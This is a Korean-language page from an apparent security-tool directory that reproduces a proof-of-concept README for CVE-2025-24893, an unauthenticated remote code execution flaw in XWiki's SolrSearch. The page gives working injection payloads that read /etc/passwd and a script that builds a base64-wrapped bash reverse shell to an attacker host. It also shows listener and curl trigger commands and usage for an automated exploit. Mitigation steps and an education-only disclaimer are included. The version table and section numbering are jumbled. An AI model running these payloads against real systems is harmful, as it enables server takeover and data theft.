Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-24893-XWiki-unauthenticated-RCE-via-SolrSearch — CVE-2025-24893은 인기 있는 오픈소스 엔터프라이즈 위키 플랫폼인 XWiki에서 발견된 심각한 인증되지 않은 원격 코드 실행(RCE) 취약점입니다. | Kitploit
도구/GitHubGitHub/iiiejlyxakaptoiiiku/cve-2025-24893-xwiki-unauthenticated-rce-via-solrsearch
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubiiiejlyxakaptoiiiku/cve-2025-24893-xwiki-unauthenticated-rce-via-solrsearch

CVE-2025-24893-XWiki-unauthenticated-RCE-via-SolrSearch

CVE-2025-24893은 인기 있는 오픈소스 엔터프라이즈 위키 플랫폼인 XWiki에서 발견된 심각한 인증되지 않은 원격 코드 실행(RCE) 취약점입니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
11년 전아직 검토되지 않음

CVE-2025-24893 – XWiki의 인증되지 않은 원격 코드 실행

0 목차

  1. 요약
  2. 취약점 세부 정보
  3. 영향을 받는 버전
  4. 개념 증명
    • 4.1 페이로드 생성
    • 4.2 수동 익스플로잇
    • 4.3 자동화된 Python 익스플로잇
  5. 완화 조치
  6. 크레딧 및 참고 자료

1 요약

  • CVE: 2025-24893
  • 구성 요소: SolrSearch 매크로 (XWiki UI)
  • 심각도: 9.8 / 치명적 (CVSS 3.1)
  • 공격 벡터: 인증되지 않은 HTTP GET
  • 영향: 임의 Groovy 실행 → 시스템 수준 RCE (Jetty/Tomcat 사용자 권한)

/xwiki/bin/get/Main/SolrSearch 엔드포인트는 신뢰할 수 없는 text= 입력을 Freemarker 템플릿에 직접 연결합니다.
공격자는 템플릿을 조기에 닫고 새 {{groovy}} … {{/groovy}} 블록을 열어 인증 없이 임의의 Groovy 코드를 실행할 수 있습니다.


2 취약점 세부 정보

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss\&text=<<<USER-DATA>>>  HTTP/1.1

SolrSearch는 제공된 텍스트를 일반 콘텐츠로 삽입해야 하지만 매크로 핸들러가 }}}를 이스케이프하지 못하므로 다음이 발생합니다:

  1. }}} 현재 Freemarker 블록을 닫습니다.
  2. 공격자는 새 매크로를 엽니다:
root@kitploit:~
   {{async async=false}}{{groovy}} … {{/groovy}}{{/async}}
  • async=false는 동기 실행을 강제합니다(게스트에게도 작동).
  1. Groovy는 XWiki JVM 프로세스의 권한으로 실행됩니다.

다음은 /etc/passwd를 출력하는 최소 PoC입니다:

root@kitploit:~
}}}{{async async=false}}{{groovy}}println("cat /etc/passwd".execute().text){{/groovy}}{{/async}}

URL 인코딩 변형(공백 → %20, 중괄호 → %7B/%7D 등):

root@kitploit:~
%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

3 영향을 받는 버전

브랜치수정 버전취약한 버전 ≤
15.x15.10.1115.10.10 (및 모든 15.9 / 15.8 …)
14.x LTS

(출처: OffSec 권고 및 XWiki SEC-S 2025-02)

endpoint


5 개념 증명

5.1 페이로드 생성

root@kitploit:~
RHOST="editor.htb:8080"
LHOST="10.10.14.8"
LPORT=4444

# 1.   one-liner reverse shell
SHELL="bash -c 'bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1'"

# 2.   Base64 (single line)
B64=$(echo -n "$SHELL" | base64 -w0)

# 3.   wrap in Groovy macro
RAW='}}}{{async async=false}}{{groovy}}"bash -c {echo,'$B64'}|{base64,-d}|{bash,-i}".execute(){{/groovy}}{{/async}}'

# 4.   URL-encode
PAYLOAD=$(python3 -c "import urllib.parse,sys;print(urllib.parse.quote(sys.argv[1],safe=''))" "$RAW")

5.2 수동 익스플로잇

root@kitploit:~
# start listener
sudo ncat -lvnp 4444

# trigger exploit
curl "http://$RHOST/xwiki/bin/get/Main/SolrSearch?media=rss&text=${PAYLOAD}"

5.3 자동화된 익스플로잇

xwiki_solr_rce.py는 exploit/ 디렉터리에 포함되어 있습니다(아래 코드 블록 참조).

root@kitploit:~
python CVE-2025-24893.py -u <TARGET URL> -l <IP> -p <PORT>

여기서

root@kitploit:~
<TARGET URL> - URL including http:// or https://

(-c "id"를 전달하면 셸 대신 임의의 명령을 실행할 수 있습니다) exploit revshell


6 완화 조치

  • 업그레이드하여 15.10.11 / 14.10.17 이상 버전 사용
  • 임시 해결 방법: 매크로 비활성화
root@kitploit:~
# /etc/xwiki/xwiki.properties
solr.search.enabled = false

7 크레딧 및 참고 자료

  • OffSec Research: “XWiki의 인증되지 않은 RCE” – 2025년 2월 20일
  • NVD 항목: https://nvd.nist.gov/vuln/detail/CVE-2025-24893
  • Exploit-DB #52136

연구 및 PoC: DeX1d


면책 고지: 교육 목적으로만 사용하세요. 소유하지 않은 시스템에 대해 실행하는 것은 불법입니다.

도구 다운로드
14.10.17
14.10.16
13 / 12유지 관리 안 됨 – 모든 버전이 취약함